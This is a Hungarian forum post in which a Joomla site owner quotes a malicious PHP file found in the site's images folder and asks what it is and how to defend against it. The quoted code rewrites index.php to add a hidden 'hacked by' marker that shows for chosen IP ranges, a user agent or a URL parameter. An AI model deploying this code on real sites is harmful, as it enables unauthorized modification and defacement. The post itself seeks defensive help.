Hirdetés

Hirdetés

Új hozzászólás Aktív témák

  • Ra's al Ghul

    senior tag

    Sziasztok!

    Egy kis segítséget szeretnék kérni. A weboldalamon a Joomla 1.5.15 verziója fut. A lényeg az, hogy az képek mappában (/images/) találtam egy cell.pHp fájlt amiben biztos vagyok, hogy nem én raktam oda. A fájlt megnyitva a következő php kód fogad:

    ?><?php

    echo '[vuln]';

    $e=$_SERVER[DOCUMENT_ROOT].'/index.php';
    if (!is_writable($e)) exit;

    $b=@file_get_contents($e);
    $i=strrev("uoy yb dekcah");
    if(strpos($b,$i))exit;

    $c='<?php $r=$_SERVER["REMOTE_ADDR"];if((preg_match("/69.42./",$r)) OR (preg_match("/compatible; MSIE 9.0; Windows NT 6.0; Trident\/5.0/i",$_SERVER["HTTP_USER_AGENT"])) OR (preg_match("/72.20./",$r)) OR (preg_match("/141.101./",$r)) OR(isset($_GET["z"]))){echo "'.$i.'";exit;}?>'."\r\n";

    $b=$c.$b;

    $f=fopen($e,"w");
    fwrite($f,$b);
    fclose($f);

    ?>

    Erre kérnék valami ötletet, hogy mi is lehet ez?

    Ezen kívül a weboldal gyökérkönyvtárában találtam egy delete-me nevű gif fájlt (delet-me.gif), amit ha megnyítok akkor a következő fogad: "Hacked by Hmei7"

    Van valami ötletetek, hogy miként lehet védekezni ilyen fajta támadások ellen?

    [ Szerkesztve ]

    Theatricality and deception are powerful agents to the uninitiated.

Új hozzászólás Aktív témák